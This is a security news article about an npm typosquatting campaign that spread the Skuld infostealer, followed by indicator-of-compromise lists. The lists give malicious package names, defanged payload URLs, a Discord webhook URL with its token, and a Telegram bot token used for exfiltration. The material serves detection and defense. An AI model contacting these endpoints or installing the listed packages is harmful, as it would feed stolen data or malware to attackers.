Skuld Malware Exploits Windows Utilities Packages

Skuld Malware Exploits Windows Utilities Packages

Researchers uncovered a malware campaign in the npm ecosystem, where “k303903” used fake packages to spread the Skuld info stealer, compromising hundreds of machines before removal.

Skuld Malware

Analysis shows “k303903” likely uses aliases like “shegotit2” and “pressurized,” all using similar methods to spread malware in the npm ecosystem, highlighting supply chain attack risks and the need for stronger security.

A recent campaign targeted npm developers with the Skuld infostealer, the second such attack in two months, resembling a previous attack on Roblox developers, showing the attackers’ adaptability.

Skuld’s ability to steal passwords, cookies, sensitive files, and browsing history from Chromium and Gecko-based browsers.

Threat actors used typosquatting and obfuscation to compromise machines and steal data, repeatedly adapting tactics with new packaging and distribution methods.

The December 2024 campaign used common methods and commodity malware, showing the threat actors’ consistent reliance on deceptive tactics.

The code downloads and runs a malicious file using libraries like fs-extra, path, node-fetch, and child_process, with the URL disguised as legitimate.

Obfuscator.io was used to hide the code, making detection harder. After installation, the malware runs the Skuld infostealer as download.exe.

Actor k303903 used typosquatting to upload fake npm packages, tricking developers into installing them. This enabled data theft via a Discord webhook and command-and-control setup.

Using trusted tools like replit.dev added to the deception, stressing the need for careful package review.

Over 600 downloads of malicious npm packages recently led to stolen credentials and sensitive data. Despite quick removal by the npm registry, the damage was significant.

Socket reports the attack mirrors a November 2024 incident, showing how threat actors rapidly evolve by reusing malware like Skuld and improving their tactics.

Developers can mitigate such risks with layered security and automated tools to detect and block malicious dependencies early.

Indicators of Compromise (IOCs) — k303903#

Malicious Packages:

  • windows-confirm
  • windows-version-check
  • downloadsolara
  • solara-config
  • aaaa89852889

Malicious URLs:

  • hxxps://alternatives-suits-obtained-bowl.trycloudflare[.]com/page
  • hxxps://971cfdde-59b5-4929-b162-6118a1825652-00-2zv0j6z5p6zi4.riker.replit[.]dev/page
  • hxxps://971cfdde-59b5-4929-b162-6118a1825652-00-2zv0j6z5p6zi4.riker.replit[.]dev/start

Discord Webhook:

  • hxxps://discord[.]com/api/webhooks/1316651715591667752/GNxf9DlNvCZmJ27gRfOlHCEVgvOG-kYbj6d2h5zaX48DpP41elqDEdBvoK1y4F1gpbbw

SHA256 Hashes:

  • 27b86c1a24a1c97952397943f7b7ef21ee6859145556fe1b197e89074672bd07

Indicators of Compromise (IOCs) — shegotit2#

Malicious Packages:

  • o7rcyti43qv
  • bootstrapper-solara
  • solara-upgrade

Malicious URLs:

  • hxxps://tours-picture-hunt-electrical.trycloudflare[.]com/page
  • hxxps://pointer-walt-blond-bi.trycloudflare[.]com/page
  • hxxps://fossil-otherwise-stylus-sq.trycloudflare[.]com/page
  • common-temperature.gl.at.ply[.]gg:38635

Telegram Webhook:

  • hxxps://api.telegram[.]org/bot7740258238:AAFZwAKMURbNCg1N0L12TTCRXWYfqUe93To

SHA256 Hashes:

  • 3f78493b9bf7a448bec44c154343e6a372ebb0dc3188e61b4699f166896d7181

Indicators of Compromise (IOCs) — pressurized#

Malicious Packages:

  • atlantis-api
  • xeno-api
  • core-builder
  • upgrade-solara
  • xeno-builder
  • get-matcha
  • solara-builder
  • solara-cleanup
  • solara-installer
  • solarainstaller
  • powerupdate
  • windows.solara
  • windowsversionupdate
  • solaramatcher
  • deathball
  • updkernels
  • antibyfron
  • programcleanup
  • robloxint

Malicious URLs:

  • hxxps://eed964e7-461c-4428-9c46-808d77ede57c-00-26f8c6izoatcc.worf.replit[.]dev/skuld
  • hxxps://3d7a78cb-b661-450d-b035-888519a4df86-00-udawht6rsoni.spock.replit[.]dev/skuld
  • hxxps://eed964e7-461c-4428-9c46-808d77ede57c-00-26f8c6izoatcc.worf.replit[.]dev/blank
  • hxxps://3d7a78cb-b661-450d-b035-888519a4df86-00-udawht6rsoni.spock.replit[.]dev/blank
  • hxxps://eed964e7-461c-4428-9c46-808d77ede57c-00-26f8c6izoatcc.worf.replit[.]dev/empyrean
  • hxxps://3d7a78cb-b661-450d-b035-888519a4df86-00-udawht6rsoni.spock.replit[.]dev/empyrean
  • hxxps://ebdfa635-60a4-499e-9da8-2b609eb309c3-00-3k30gj5i2z09x.riker.replit[.]dev/kyore
  • hxxps://ebdfa635-60a4-499e-9da8-2b609eb309c3-00-3k30gj5i2z09x.riker.replit[.]dev/sk
  • hxxps://ebdfa635-60a4-499e-9da8-2b609eb309c3-00-3k30gj5i2z09x.riker.replit[.]dev/ps
  • hxxps://github.com/ifhw/code/raw/main/cmd[.]exe
  • hxxps://github.com/ifhw/code/raw/main/RuntimeServiceWorker[.]exe
  • hxxps://github.com/ifhw/code/raw/main/py[.]exe

About the Author:

FirstHackersNews- Identifies Security

Leave A Comment

Subscribe to our newsletter to receive security tips everday!